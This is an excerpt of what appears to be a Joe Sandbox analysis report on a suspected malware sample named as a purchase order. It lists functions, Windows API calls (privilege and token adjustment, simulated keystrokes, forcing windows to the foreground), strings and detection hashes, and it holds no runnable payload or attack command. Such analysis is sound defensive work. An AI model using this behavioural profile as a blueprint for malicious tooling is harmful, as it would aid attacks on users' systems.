                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __flush__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 4101623367-0
                                                                                                              • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                              • Instruction ID: 36c52ded53cb1c45de6bb8c34fd8e954877029bb9075875942f486c0199d070e
                                                                                                              • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                              • Instruction Fuzzy Hash: 0B4195717007069FDB288EA9CA8856F77A6AF44360F24853FE855E72C0DBB8DD418F48
                                                                                                              Function 003FED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                              • Instruction ID: 8b3cbb5c11660f3178402d19a3f20207eff25623b3bb69f9ac084d08bd719c9a
                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                              • Instruction Fuzzy Hash: D031E470A00109DFC71ADF58C490A79FBAAFF49340B6586A5F509CBA66DB31EDC1CB80
                                                                                                              Function 003E41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E4214: FreeLibrary.KERNEL32(00000000,?), ref: 003E4247
                                                                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003E39FE,?,00000001), ref: 003E41DB
                                                                                                                • Part of subcall function 003E4291: FreeLibrary.KERNEL32(00000000), ref: 003E42C4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Free$Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2391024519-0
                                                                                                              • Opcode ID: 8fea74fd4373c911e7dbc3ac0840b1697eea741d7152d9051d831affa5c7934b
                                                                                                              • Instruction ID: 6a0c69967bf93debe68a999e60502773b867753ae5c7743763eac067fc697b9d
                                                                                                              • Opcode Fuzzy Hash: 8fea74fd4373c911e7dbc3ac0840b1697eea741d7152d9051d831affa5c7934b
                                                                                                              • Instruction Fuzzy Hash: 6E112732700325ABCF11BB76DC02F9E77A89F48704F10892DFA92AE1C1DB74DA049B64
                                                                                                              Function 0040AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___lock_fhandle.LIBCMT ref: 0040AFC0
                                                                                                                • Part of subcall function 00407BDA: __getptd_noexit.LIBCMT ref: 00407BDA
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit$___lock_fhandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 1144279405-0
                                                                                                              • Opcode ID: 7eadd4a9b4f8c3e56cc7f82858ea9c7abc7cfc925ce2f704d78e48d816086be4
                                                                                                              • Instruction ID: b7d1bf512b80697c41178f06449301ee036447d0e6cdbb3b1e572a3116d00eca
                                                                                                              • Opcode Fuzzy Hash: 7eadd4a9b4f8c3e56cc7f82858ea9c7abc7cfc925ce2f704d78e48d816086be4
                                                                                                              • Instruction Fuzzy Hash: 4311B2729056008BD7127FA5C80135A3B609F82339F16867AE4303F2E2D7BC9D109BEE
                                                                                                              Function 003E39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                                              • Instruction ID: 6ab40a03f288fca368ad431fd61b777cb6a30e832f66fcf0fc8d044948a39420
                                                                                                              • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                                              • Instruction Fuzzy Hash: 0301A93150014DAFCF05EFA5C8818FFBB78EF15304F00812AB512971E5EA309A49DF64
                                                                                                              Function 00402AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __lock_file.LIBCMT ref: 00402AED
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit__lock_file
                                                                                                              • String ID:
                                                                                                              • API String ID: 2597487223-0
                                                                                                              • Opcode ID: c095124b8e52681dc6a46ac3668420dc1eda8e458ebe733520907f5bf8e75aa4
                                                                                                              • Instruction ID: 2ae8e173640a3ee3ac10b9bfec3d5d33a1304714562b88bdf4c4cdd9a61f7d91
                                                                                                              • Opcode Fuzzy Hash: c095124b8e52681dc6a46ac3668420dc1eda8e458ebe733520907f5bf8e75aa4
                                                                                                              • Instruction Fuzzy Hash: A8F0C83160020596DF21BF66CD0A39F3AA57F40324F15443BB410BA1D1DBBC8962DF89
                                                                                                              Function 003E4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,003E39FE,?,00000001), ref: 003E4286
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
                                                                                                              • Opcode ID: 6078736898da431ee74d425bc2410dfb8ce569087993a51d8e2dbcad8a25275d
                                                                                                              • Instruction ID: 029aef5d0125df8b6ece8c77d5a75440511caff0baa8741b805214aa7d8d9f35
                                                                                                              • Opcode Fuzzy Hash: 6078736898da431ee74d425bc2410dfb8ce569087993a51d8e2dbcad8a25275d
                                                                                                              • Instruction Fuzzy Hash: 47F08C70904361CFCB358F62D884812BBF4AF083153218F7EF2C682550C3719840CB40
                                                                                                              Function 003E40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003E40C6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LongNamePath
                                                                                                              • String ID:
                                                                                                              • API String ID: 82841172-0
                                                                                                              • Opcode ID: 52ff0fcf01b0a84ace1dc718e1ddcb8ca22e084b388949580f433044bac8d9e9
                                                                                                              • Instruction ID: ea6ce1244c5280c91ab99da5d38641d5f5c9aa7d033bd9b0ff12816fd7e3b1d5
                                                                                                              • Opcode Fuzzy Hash: 52ff0fcf01b0a84ace1dc718e1ddcb8ca22e084b388949580f433044bac8d9e9
                                                                                                              • Instruction Fuzzy Hash: CDE07D33A001241BC711A255CC42FEE339CDF88690F050075F904E7244DAB499808690
                                                                                                              Function 00D7823C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000001F4), ref: 00D78251
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                              • Instruction ID: 5de52e42697991b67cd66f441d2fd34460b193a0cfbdb6f74db05d907ed798ad
                                                                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                              • Instruction Fuzzy Hash: 62E04F3498010DEFCB00EFA8D54D6DE7BB4EF00302F1005A0FD06D3680DB309E508A62
                                                                                                              Function 00D78240 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000001F4), ref: 00D78251
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                              • Instruction ID: 6af6294524e0dabf5bd0adb0e830011e7e805160ac153297260bf322d238070d
                                                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                              • Instruction Fuzzy Hash: 06E0BF7498410D9FDB00EFA8D54969E7BB4EF04302F104161FD0692281DA3099509A62

                                                                                                              Non-executed Functions

                                                                                                              Function 0044F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0044F87D
                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044F8DC
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044F919
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0044F940
                                                                                                              • SendMessageW.USER32 ref: 0044F966
                                                                                                              • _wcsncpy.LIBCMT ref: 0044F9D2
                                                                                                              • GetKeyState.USER32(00000011), ref: 0044F9F3
                                                                                                              • GetKeyState.USER32(00000009), ref: 0044FA00
                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044FA16
                                                                                                              • GetKeyState.USER32(00000010), ref: 0044FA20
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0044FA4F
                                                                                                              • SendMessageW.USER32 ref: 0044FA72
                                                                                                              • SendMessageW.USER32(?,00001030,?,0044E059), ref: 0044FB6F
                                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0044FB85
                                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0044FB96
                                                                                                              • SetCapture.USER32(?), ref: 0044FB9F
                                                                                                              • ClientToScreen.USER32(?,?), ref: 0044FC03
                                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0044FC0F
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0044FC29
                                                                                                              • ReleaseCapture.USER32 ref: 0044FC34
                                                                                                              • GetCursorPos.USER32(?), ref: 0044FC69
                                                                                                              • ScreenToClient.USER32(?,?), ref: 0044FC76
                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0044FCD8
                                                                                                              • SendMessageW.USER32 ref: 0044FD02
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0044FD41
                                                                                                              • SendMessageW.USER32 ref: 0044FD6C
                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0044FD84
                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0044FD8F
                                                                                                              • GetCursorPos.USER32(?), ref: 0044FDB0
                                                                                                              • ScreenToClient.USER32(?,?), ref: 0044FDBD
                                                                                                              • GetParent.USER32(?), ref: 0044FDD9
                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0044FE3F
                                                                                                              • SendMessageW.USER32 ref: 0044FE6F
                                                                                                              • ClientToScreen.USER32(?,?), ref: 0044FEC5
                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0044FEF1
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0044FF19
                                                                                                              • SendMessageW.USER32 ref: 0044FF3C
                                                                                                              • ClientToScreen.USER32(?,?), ref: 0044FF86
                                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0044FFB6
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0045004B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                              • String ID: @GUI_DRAGID$F
                                                                                                              • API String ID: 2516578528-4164748364
                                                                                                              • Opcode ID: abfd9640e1474f06387be19a9438225666d7f1b0479da2e3d717cfbfe2c7e045
                                                                                                              • Instruction ID: cc3fe950eff1dae800439dc52d192c564c00beaa656830a60161b96da3a91d0b
                                                                                                              • Opcode Fuzzy Hash: abfd9640e1474f06387be19a9438225666d7f1b0479da2e3d717cfbfe2c7e045
                                                                                                              • Instruction Fuzzy Hash: 7732A974A04244AFEB10DF24CC84BABBBE4BF49354F14062AF6958B2B1D775DC09CB5A
                                                                                                              Function 0044AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0044B1CD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: %d/%02d/%02d
                                                                                                              • API String ID: 3850602802-328681919
                                                                                                              • Opcode ID: c97614ef08484f9b39b63f5ea60a2fc20308e4f183716ad12c81f533a892ca50
                                                                                                              • Instruction ID: 5282338976ea382dc038b7ba62d4f45d4417dfec049b689320bc04dd75ef99cc
                                                                                                              • Opcode Fuzzy Hash: c97614ef08484f9b39b63f5ea60a2fc20308e4f183716ad12c81f533a892ca50
                                                                                                              • Instruction Fuzzy Hash: AB12C271A40218ABFB258F65CC49FAB7BB8FF45310F10412AF916DB2D1DB789901CB5A
                                                                                                              Function 003FEB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 003FEB4A
                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00453AEA
                                                                                                              • IsIconic.USER32(000000FF), ref: 00453AF3
                                                                                                              • ShowWindow.USER32(000000FF,00000009), ref: 00453B00
                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00453B0A
                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00453B20
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00453B27
                                                                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00453B33
                                                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00453B44
                                                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00453B4C
                                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00453B54
                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00453B57
                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00453B6C
                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00453B77
                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00453B81
                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00453B86
                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00453B8F
                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00453B94
                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00453B9E
                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00453BA3
                                                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00453BA6
                                                                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00453BCD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                              • String ID: Shell_TrayWnd
                                                                                                              • API String ID: 4125248594-2988720461
                                                                                                              • Opcode ID: 6b3fa75a9f1312739eaeb6eb84dd0081a19cb86eb04c3d2e1b7851eebf5272fa
                                                                                                              • Instruction ID: b8f8d218a8beed6bfc34115fcbecfcfc8be6d939ea0fa5322f9442334409c277
                                                                                                              • Opcode Fuzzy Hash: 6b3fa75a9f1312739eaeb6eb84dd0081a19cb86eb04c3d2e1b7851eebf5272fa
                                                                                                              • Instruction Fuzzy Hash: 6A3185B1F403187BEB205F658C49F7F7E6CEB44B91F104026FA05EA1D1E6F45D01AAAA
                                                                                                              Function 0041ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041B180
                                                                                                                • Part of subcall function 0041B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0041B1AD
                                                                                                                • Part of subcall function 0041B134: GetLastError.KERNEL32 ref: 0041B1BA
                                                                                                              • _memset.LIBCMT ref: 0041AD08
                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0041AD5A
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0041AD6B
                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0041AD82
                                                                                                              • GetProcessWindowStation.USER32 ref: 0041AD9B
                                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 0041ADA5
                                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0041ADBF
                                                                                                                • Part of subcall function 0041AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0041ACC0), ref: 0041AB99
                                                                                                                • Part of subcall function 0041AB84: CloseHandle.KERNEL32(?,?,0041ACC0), ref: 0041ABAB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                              • String ID: $H*I$default$winsta0
                                                                                                              • API String ID: 2063423040-1865604469
                                                                                                              • Opcode ID: 61a128681a193517b4ea1a546a95475eacbdfbc0184ce2abba32d3a7efa9fe49
                                                                                                              • Instruction ID: b2187b0ddb41303134e0764329ebfad7ebc69fb36ebe4fa0e096b79141d7ba4a
                                                                                                              • Opcode Fuzzy Hash: 61a128681a193517b4ea1a546a95475eacbdfbc0184ce2abba32d3a7efa9fe49
